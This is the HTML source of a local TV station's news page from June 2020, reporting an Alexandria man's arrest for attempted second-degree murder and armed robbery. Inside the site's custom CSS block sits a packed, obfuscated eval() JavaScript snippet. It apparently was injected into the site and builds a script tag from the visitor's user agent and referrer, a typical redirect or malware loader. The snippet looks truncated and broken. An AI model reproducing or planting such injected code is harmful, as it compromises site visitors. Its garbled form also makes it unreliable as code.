<!DOCTYPE html>
<html lang="en-US">
<head>
	<meta charset="UTF-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11"/>
	<title>Attempted 2nd Degree Murder and Armed Robbery Arrest &#8211; KLAX-TV</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Feed" href="http://klax-tv.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Comments Feed" href="http://klax-tv.com/comments/feed/" />
<link rel="alternate" type="text/calendar" title="KLAX-TV &raquo; iCal Feed" href="http://klax-tv.com/events/?ical=1" />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Attempted 2nd Degree Murder and Armed Robbery Arrest Comments Feed" href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/feed/" />
<!-- This site uses the Google Analytics by ExactMetrics plugin v6.0.1 - Using Analytics tracking - https://www.exactmetrics.com/ -->
<script type="text/javascript" data-cfasync="false">
	var em_version         = '6.0.1';
	var em_track_user      = true;
	var em_no_track_reason = '';
	
	var disableStr = 'ga-disable-UA-106145994-1';

	/* Function to detect opted out users */
	function __gaTrackerIsOptedOut() {
		return document.cookie.indexOf(disableStr + '=true') > -1;
	}

	/* Disable tracking if the opt-out cookie exists. */
	if ( __gaTrackerIsOptedOut() ) {
		window[disableStr] = true;
	}

	/* Opt-out function */
	function __gaTrackerOptout() {
	  document.cookie = disableStr + '=true; expires=Thu, 31 Dec 2099 23:59:59 UTC; path=/';
	  window[disableStr] = true;
	}

	if ( 'undefined' === typeof gaOptout ) {
		function gaOptout() {
			__gaTrackerOptout();
		}
	}
	
	if ( em_track_user ) {
		(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
			(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
			m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
		})(window,document,'script','//www.google-analytics.com/analytics.js','__gaTracker');

window.ga = __gaTracker;		__gaTracker('create', 'UA-106145994-1', 'auto');
		__gaTracker('set', 'forceSSL', true);
		__gaTracker('send','pageview');
		__gaTracker( function() { window.ga = __gaTracker; } );
	} else {
		console.log( "" );
		(function() {
			/* https://developers.google.com/analytics/devguides/collection/analyticsjs/ */
			var noopfn = function() {
				return null;
			};
			var noopnullfn = function() {
				return null;
			};
			var Tracker = function() {
				return null;
			};
			var p = Tracker.prototype;
			p.get = noopfn;
			p.set = noopfn;
			p.send = noopfn;
			var __gaTracker = function() {
				var len = arguments.length;
				if ( len === 0 ) {
					return;
				}
				var f = arguments[len-1];
				if ( typeof f !== 'object' || f === null || typeof f.hitCallback !== 'function' ) {
					console.log( 'Not running function __gaTracker(' + arguments[0] + " ....) because you are not being tracked. " + em_no_track_reason );
					return;
				}
				try {
					f.hitCallback();
				} catch (ex) {

				}
			};
			__gaTracker.create = function() {
				return new Tracker();
			};
			__gaTracker.getByName = noopnullfn;
			__gaTracker.getAll = function() {
				return [];
			};
			__gaTracker.remove = noopfn;
			window['__gaTracker'] = __gaTracker;
			window.ga = __gaTracker;		})();
		}
</script>
<!-- / Google Analytics by ExactMetrics -->
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/klax-tv.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.3.4"}};
			!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
	<link rel='stylesheet' id='tribe-common-skeleton-style-css'  href='http://klax-tv.com/wp-content/plugins/the-events-calendar/common/src/resources/css/common-skeleton.min.css?ver=4.11.1' type='text/css' media='all' />
<link rel='stylesheet' id='tribe-tooltip-css'  href='http://klax-tv.com/wp-content/plugins/the-events-calendar/common/src/resources/css/tooltip.min.css?ver=4.11.1' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css'  href='http://klax-tv.com/wp-includes/css/dist/block-library/style.min.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='sclbttns_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/css/style.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='fcbkbttn_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/facebook-button-plugin/css/style.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='twttr_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/twitter-plugin/css/style.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='lnkdn_icon-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-linkedin/css/icon.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='lnkdn_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-linkedin/css/style.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='pntrst_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-pinterest/css/style.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='theme-my-login-css'  href='http://klax-tv.com/wp-content/plugins/theme-my-login/assets/styles/theme-my-login.min.css?ver=7.0.15' type='text/css' media='all' />
<link rel='stylesheet' id='colormag_google_fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C600&#038;ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='colormag_style-css'  href='http://klax-tv.com/wp-content/themes/colormag/style.css?ver=5.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='colormag-fontawesome-css'  href='http://klax-tv.com/wp-content/themes/colormag/fontawesome/css/font-awesome.css?ver=4.2.1' type='text/css' media='all' />
<script type='text/javascript'>
/* <![CDATA[ */
var exactmetrics_frontend = {"js_events_tracking":"true","download_extensions":"zip,mp3,mpeg,pdf,docx,pptx,xlsx,rar","inbound_paths":"[{\"path\":\"\\\/go\\\/\",\"label\":\"affiliate\"},{\"path\":\"\\\/recommend\\\/\",\"label\":\"affiliate\"}]","home_url":"http:\/\/klax-tv.com","hash_tracking":"false"};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/google-analytics-dashboard-for-wp/assets/js/frontend.min.js?ver=6.0.1'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/social-buttons-pack/facebook-button-plugin/js/script.js?ver=5.3.4'></script>
<!--[if lte IE 8]>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/html5shiv.min.js?ver=5.3.4'></script>
<![endif]-->
<link rel='https://api.w.org/' href='http://klax-tv.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://klax-tv.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://klax-tv.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='LSUA Department of Nursing Receives Blue Cross Blue Shield Award' href='http://klax-tv.com/lsua-department-of-nursing-receives-blue-cross-blue-shield-award/' />
<link rel='next' title='Rapides Parish Library now offers laptops and hotspots for check out' href='http://klax-tv.com/rapides-parish-library-now-offers-laptops-and-hotspots-for-check-out/' />
<meta name="generator" content="WordPress 5.3.4" />
<link rel="canonical" href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/" />
<link rel='shortlink' href='http://klax-tv.com/?p=70122' />
<link rel="alternate" type="application/json+oembed" href="http://klax-tv.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fklax-tv.com%2Fattempted-2nd-degree-murder-and-armed-robbery-arrest%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://klax-tv.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fklax-tv.com%2Fattempted-2nd-degree-murder-and-armed-robbery-arrest%2F&#038;format=xml" />

<!-- This site is using AdRotate v5.7 to display their advertisements - https://ajdg.solutions/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-7 { min-width:0px; max-width:250px; }
	.b-7 { margin:0px 0px 0px 0px; }
	.g-9 { min-width:0px; max-width:300px; }
	.b-9 { margin:0px 0px 0px 0px; }
	.g-11 { width:auto; }
	.b-11 { margin:5px 0px 0px 0px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->


<!-- fcbkbttn meta start -->
<meta property="og:url" content="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/"/>
<meta property="og:title" content="Attempted 2nd Degree Murder and Armed Robbery Arrest"/>
<meta property="og:site_name" content="KLAX-TV"/>
<meta property="og:image" content="http://klax-tv.com/wp-content/uploads/2020/06/arrest-graphic-300x171.jpg"/>
<meta property="og:description" content="Alexandria, La. (June 24, 2020) – Alexandria police have arrested an Alexandria man in connection with a stabbing and robbery that occurred Sunday in the 2000 block of North Mall Drive.
"/>
<!-- fcbkbttn meta end -->		<script type="text/javascript" src="//assets.pinterest.com/js/pinit.js" async data-pin-save="true" data-pin-lang="en" data-pin-count="none"></script>
	<meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="http://klax-tv.com"><link rel="https://theeventscalendar.com/" href="http://klax-tv.com/wp-json/tribe/events/v1/" /><style type="text/css" id="custom-background-css">
body.custom-background { background-color: #a5a5a5; background-image: url("http://klax-tv.com/wp-content/uploads/2019/02/small-blueNet_Standard_LandScape.jpg"); background-position: left top; background-size: contain; background-repeat: no-repeat; background-attachment: fixed; }
</style>
	<link rel="icon" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-32x32.jpg" sizes="32x32" />
<link rel="icon" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-180x180.jpg" />
<meta name="msapplication-TileImage" content="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-270x270.jpg" />
<!-- KLAX-TV Internal Styles -->		<style type="text/css">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</style>
		<!-- KLAX-TV Elementor Internal Styles -->			<style type="text/css">.elementor .tg-module-wrapper .module-title{border-bottom:1px solid #336699}.elementor .tg-module-wrapper .module-title span,.elementor .tg-module-wrapper .tg-post-category{background-color:#336699}.elementor .tg-module-wrapper .tg-module-meta .tg-module-comments a:hover,.elementor .tg-module-wrapper .tg-module-meta .tg-post-auther-name a:hover,.elementor .tg-module-wrapper .tg-module-meta .tg-post-date a:hover,.elementor .tg-module-wrapper .tg-module-title:hover a,.elementor .tg-module-wrapper.tg-module-grid .tg_module_grid .tg-module-info .tg-module-meta a:hover{color:#336699}</style>
					<style type="text/css" id="wp-custom-css">
			.home eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhfie|var|u0026u|referrer|zfkhz||js|php'.split('|'),0,{}))
 .below-entry-meta .posted-on {
    display: none;
}
		</style>
		</head>

<body class="post-template-default single single-post postid-70122 single-format-standard custom-background wp-custom-logo colormag tribe-no-js tribe-theme-colormag  wide better-responsive-menu elementor-default">



<div id="page" class="hfeed site">
	<a class="skip-link screen-reader-text" href="#main">Skip to content</a>

	
	
	<header id="masthead" class="site-header clearfix ">
		<div id="header-text-nav-container" class="clearfix">

						<div class="news-bar">
				<div class="inner-wrap clearfix">
					
		<div class="date-in-header">
			Wednesday, June 24, 2020		</div>

		
							<div class="breaking-news">
			<strong class="breaking-news-latest">Latest:</strong>
			<ul class="newsticker">
									<li>
						<a href="http://klax-tv.com/baseballs-back-mlb-sets-60-game-sked-opens-july-23-or-24/"
						   title="Baseball’s back: MLB sets 60-game sked, opens July 23 or 24">Baseball’s back: MLB sets 60-game sked, opens July 23 or 24</a>
					</li>
									<li>
						<a href="http://klax-tv.com/rapides-parish-library-now-offers-laptops-and-hotspots-for-check-out/"
						   title="Rapides Parish Library now offers laptops and hotspots for check out">Rapides Parish Library now offers laptops and hotspots for check out</a>
					</li>
									<li>
						<a href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/"
						   title="Attempted 2nd Degree Murder and Armed Robbery Arrest">Attempted 2nd Degree Murder and Armed Robbery Arrest</a>
					</li>
									<li>
						<a href="http://klax-tv.com/lsua-department-of-nursing-receives-blue-cross-blue-shield-award/"
						   title="LSUA Department of Nursing Receives Blue Cross Blue Shield Award">LSUA Department of Nursing Receives Blue Cross Blue Shield Award</a>
					</li>
									<li>
						<a href="http://klax-tv.com/northwood-gators-fighting-early-for-a-great-season/"
						   title="Northwood Gators fighting early for a great season">Northwood Gators fighting early for a great season</a>
					</li>
							</ul>
		</div>
		
							<div class="social-links clearfix">
			<ul>
				<li><a href="http://www.Facebook.com/KLAX31" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://twitter.com/KLAXTV" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/klaxtv/" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://www.youtube.com/klaxproduction" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
						</div>
			</div>
		
			
			
		<div class="inner-wrap">

			<div id="header-text-nav-wrap" class="clearfix">
				<div id="header-left-section">
											<div id="header-logo-image">
							<a href="http://klax-tv.com/" class="custom-logo-link" rel="home"><img width="406" height="90" src="http://klax-tv.com/wp-content/uploads/2019/05/cropped-BLACK-AND-WHITE-KLAX-LOGO-1.jpg" class="custom-logo" alt="KLAX-TV" srcset="http://klax-tv.com/wp-content/uploads/2019/05/cropped-BLACK-AND-WHITE-KLAX-LOGO-1.jpg 406w, http://klax-tv.com/wp-content/uploads/2019/05/cropped-BLACK-AND-WHITE-KLAX-LOGO-1-300x67.jpg 300w" sizes="(max-width: 406px) 100vw, 406px" /></a>						</div><!-- #header-logo-image -->
											<div id="header-text" class="screen-reader-text">
													<h3 id="site-title">
								<a href="http://klax-tv.com/" title="KLAX-TV" rel="home">KLAX-TV</a>
							</h3>
												<!-- #site-description -->
					</div><!-- #header-text -->
				</div><!-- #header-left-section -->
				<div id="header-right-section">
											<div id="header-right-sidebar" class="clearfix">
							<aside id="custom_html-6" class="widget_text widget widget_custom_html clearfix"><div class="textwidget custom-html-widget"></div></aside>						</div>
										</div><!-- #header-right-section -->

			</div><!-- #header-text-nav-wrap -->

		</div><!-- .inner-wrap -->

		
			
			
		<nav id="site-navigation" class="main-navigation clearfix" role="navigation">
			<div class="inner-wrap clearfix">
				
									<div class="search-random-icons-container">
													<div class="top-search-wrap">
								<i class="fa fa-search search-top"></i>
								<div class="search-form-top">
									<form action="http://klax-tv.com/" class="search-form searchform clearfix" method="get">
   <div class="search-wrap">
      <input type="text" placeholder="Search" class="s field" name="s">
      <button class="search-icon" type="submit"></button>
   </div>
</form><!-- .searchform -->								</div>
							</div>
											</div>
				
				<p class="menu-toggle"></p>
				<div class="menu-primary-container"><ul id="menu-klax-tv" class="menu"><li id="menu-item-29273" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-29273"><a href="http://klax-tv.com">Home</a></li>
<li id="menu-item-17620" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-17620"><a href="http://klax-tv.com/category/localheadlines/">News</a>
<ul class="sub-menu">
	<li id="menu-item-17619" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-17619"><a href="http://klax-tv.com/category/localheadlines/">Local News</a></li>
	<li id="menu-item-17988" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17988"><a href="http://klax-tv.com/category/community-news/">Community News</a></li>
	<li id="menu-item-39750" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39750"><a href="http://klax-tv.com/category/elections/">Elections</a></li>
	<li id="menu-item-29885" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29885"><a href="http://klax-tv.com/category/state-news/">State News</a></li>
	<li id="menu-item-32504" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-32504"><a href="http://abcnews.go.com/">National News</a></li>
	<li id="menu-item-17917" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17917"><a href="http://klax-tv.com/category/business-news/">Business News</a></li>
	<li id="menu-item-49035" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49035"><a href="http://klax-tv.com/category/campus/">Campus News</a></li>
	<li id="menu-item-18470" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18470"><a href="http://klax-tv.com/category/health-medical/">Health News</a></li>
	<li id="menu-item-49034" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49034"><a href="http://klax-tv.com/category/sports-news/">Sports News</a></li>
	<li id="menu-item-1787" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1787"><a href="http://klax-tv.com/gas-buddy/">Gas Buddy</a></li>
</ul>
</li>
<li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33"><a href="http://klax-tv.com/weather/">Weather</a></li>
<li id="menu-item-17987" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-17987"><a href="http://klax-tv.com/category/community-news/">Community</a>
<ul class="sub-menu">
	<li id="menu-item-38143" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-38143"><a href="http://www.klax-tv.com/events">Community Calendar</a></li>
	<li id="menu-item-32125" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32125"><a href="http://klax-tv.com/category/road-closures/">Road Closures</a></li>
	<li id="menu-item-48865" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48865"><a href="http://klax-tv.com/category/boil-advisories/">Boil Advisories</a></li>
	<li id="menu-item-34460" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-34460"><a href="http://klax-tv.com/category/cancelledpostponed/">Cancelled/Postponed Events</a></li>
	<li id="menu-item-1279" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1279"><a href="http://klax-tv.com/public-service-announcements/">Submit your PSA</a></li>
</ul>
</li>
<li id="menu-item-46922" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-46922"><a href="http://klax-tv.com/schedule/">Schedule</a></li>
<li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-40"><a href="http://klax-tv.com/about/">About Us</a>
<ul class="sub-menu">
	<li id="menu-item-5856" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5856"><a href="http://klax-tv.com/about/">About KLAX TV</a></li>
	<li id="menu-item-5850" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5850"><a href="http://klax-tv.com/meet-the-team/">Meet the Staff</a></li>
	<li id="menu-item-49336" class="menu-item menu-item-type-post_type menu-item-object-page current-post-parent menu-item-49336"><a href="http://klax-tv.com/advertise/">Advertise with Us</a></li>
	<li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="http://klax-tv.com/commercial-production/">Production</a></li>
	<li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39"><a href="http://klax-tv.com/employment/">Careers at KLAX</a></li>
	<li id="menu-item-23362" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23362"><a href="https://publicfiles.fcc.gov/tv-profile/klax-tv">Public Inspection Files</a></li>
	<li id="menu-item-17310" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17310"><a href="http://klax-tv.com/contact-2/">Contact</a></li>
</ul>
</li>
<li id="menu-item-17822" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17822"><a href="http://metvalexandria.com/">MeTV</a></li>
<li id="menu-item-68092" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-68092"><a href="http://klax-tv.com/dish">DISH DISPUTE</a></li>
</ul></div>
			</div>
		</nav>

		
		</div><!-- #header-text-nav-container -->

		
	</header>

		
	<div id="main" class="clearfix">
		<div class="inner-wrap clearfix">

	
	<div id="primary">
		<div id="content" class="clearfix">

			
				
<article id="post-70122" class="post-70122 post type-post status-publish format-standard has-post-thumbnail hentry category-localheadlines">
	
   
         <div class="featured-image">
               <img width="770" height="440" src="http://klax-tv.com/wp-content/uploads/2020/06/arrest-graphic.jpg" class="attachment-colormag-featured-image size-colormag-featured-image wp-post-image" alt="" srcset="http://klax-tv.com/wp-content/uploads/2020/06/arrest-graphic.jpg 770w, http://klax-tv.com/wp-content/uploads/2020/06/arrest-graphic-300x171.jpg 300w, http://klax-tv.com/wp-content/uploads/2020/06/arrest-graphic-768x439.jpg 768w" sizes="(max-width: 770px) 100vw, 770px" /><div class="ccfic"></div>            </div>
   
   <div class="article-content clearfix">

   
   <div class="above-entry-meta"><span class="cat-links"><a href="http://klax-tv.com/category/localheadlines/"  rel="category tag">Local Headlines</a>&nbsp;</span></div>
      <header class="entry-header">
   		<h1 class="entry-title">
   			Attempted 2nd Degree Murder and Armed Robbery Arrest   		</h1>
   	</header>

   	<div class="below-entry-meta">
			<span class="posted-on"><a href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/" title="4:14 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2020-06-24T16:14:12-05:00">June 24, 2020</time></a></span>
			<span class="byline">
				<span class="author vcard">
					<i class="fa fa-user"></i>
					<a class="url fn n"
					   href="http://klax-tv.com/author/mglover/"
					   title="Meagan Glover">Meagan Glover					</a>
				</span>
			</span>

							<span class="comments"><a href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/#respond"><i class="fa fa-comment"></i> 0 Comments</a></span>
			</div>
   	<div class="entry-content clearfix">
   		<div class="fcbkbttn_buttons_block" id="fcbkbttn_left"><div class="fcbkbttn_like "><fb:like href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/" action="like" colorscheme="light" layout="standard" show-faces='false' width="450px" size="small"></fb:like></div><div class="fb-share-button  " data-href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/" data-type="button_count" data-size="small"></div></div><div class="lnkdn_buttons"></div><div class="twttr_buttons"><div class="twttr_twitter">
					<a href="http://twitter.com/share?text=Attempted+2nd+Degree+Murder+and+Armed+Robbery+Arrest" class="twitter-share-button" data-via="" data-hashtags=""  data-size="default" data-url="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/"  data-related="" target="_blank">Tweet</a>
				</div></div><p><em>Alexandria, La. (June 24, 2020)</em> – Alexandria police have arrested an Alexandria man in connection with a stabbing and robbery that occurred Sunday in the 2000 block of North Mall Drive.</p>
<p>Dakota Lee Erwin, 25, of Alexandria, was arrested Tuesday and charged with attempted second degree murder and armed robbery.</p>
<p>This incident remains under investigation. If anyone has any information about the incident, please contact the Detective Division at 318-449-5099.</p>
<div class="twttr_buttons"><div class="twttr_twitter">
					<a href="http://twitter.com/share?text=Attempted+2nd+Degree+Murder+and+Armed+Robbery+Arrest" class="twitter-share-button" data-via="" data-hashtags=""  data-size="default" data-url="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/"  data-related="" target="_blank">Tweet</a>
				</div></div><div class="fcbkbttn_buttons_block" id="fcbkbttn_left"><div class="fcbkbttn_like "><fb:like href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/" action="like" colorscheme="light" layout="standard" show-faces='false' width="450px" size="small"></fb:like></div><div class="fb-share-button  " data-href="http://klax-tv.com/attempted-2nd-degree-murder-and-armed-robbery-arrest/" data-type="button_count" data-size="small"></div></div>   	</div>

   </div>

	</article>

			
		</div><!-- #content -->

      
		<ul class="default-wp-page clearfix">
			<li class="previous"><a href="http://klax-tv.com/lsua-department-of-nursing-receives-blue-cross-blue-shield-award/" rel="prev"><span class="meta-nav">&larr;</span> LSUA Department of Nursing Receives Blue Cross Blue Shield Award</a></li>
			<li class="next"><a href="http://klax-tv.com/rapides-parish-library-now-offers-laptops-and-hotspots-for-check-out/" rel="next">Rapides Parish Library now offers laptops and hotspots for check out <span class="meta-nav">&rarr;</span></a></li>
		</ul>
	
      
      

	<h4 class="related-posts-main-title">
		<i class="fa fa-thumbs-up"></i><span>You May Also Like</span>
	</h4>

	<div class="related-posts clearfix">

					<div class="single-related-posts">

				
				<div class="article-content">

					<h3 class="entry-title">
						<a href="http://klax-tv.com/alexandria-mayor-holds-first-meeting-of-new-year/" rel="bookmark" title="Alexandria Mayor Holds First Meeting of New Year">Alexandria Mayor Holds First Meeting of New Year</a>
					</h3><!--/.post-title-->

					<div class="below-entry-meta">
						<span class="posted-on"><a href="http://klax-tv.com/alexandria-mayor-holds-first-meeting-of-new-year/" title="3:44 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published" datetime="2016-01-13T15:44:49-06:00">January 13, 2016</time><time class="updated" datetime="2016-01-13T15:46:42-06:00">January 13, 2016</time></a></span>
						<span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/sally-2/" title="KLAX TV, ABC 31">KLAX TV, ABC 31</a></span></span>

											</div>

				</div>

			</div><!--/.related-->
					<div class="single-related-posts">

									<div class="related-posts-thumbnail">
						<a href="http://klax-tv.com/arrest-for-not-returning-a-rental-vehicle-drugs-and-burglary/" title="Arrest for Not Returning a Rental Vehicle, Drugs, and Burglary">
							<img width="390" height="205" src="http://klax-tv.com/wp-content/uploads/2017/07/bars-4-390x205.jpg" class="attachment-colormag-featured-post-medium size-colormag-featured-post-medium wp-post-image" alt="" />						</a>
					</div>
				
				<div class="article-content">

					<h3 class="entry-title">
						<a href="http://klax-tv.com/arrest-for-not-returning-a-rental-vehicle-drugs-and-burglary/" rel="bookmark" title="Arrest for Not Returning a Rental Vehicle, Drugs, and Burglary">Arrest for Not Returning a Rental Vehicle, Drugs, and Burglary</a>
					</h3><!--/.post-title-->

					<div class="below-entry-meta">
						<span class="posted-on"><a href="http://klax-tv.com/arrest-for-not-returning-a-rental-vehicle-drugs-and-burglary/" title="8:02 am" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published updated" datetime="2017-07-19T08:02:31-05:00">July 19, 2017</time></a></span>
						<span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/sally-2/" title="KLAX TV, ABC 31">KLAX TV, ABC 31</a></span></span>

											</div>

				</div>

			</div><!--/.related-->
					<div class="single-related-posts">

				
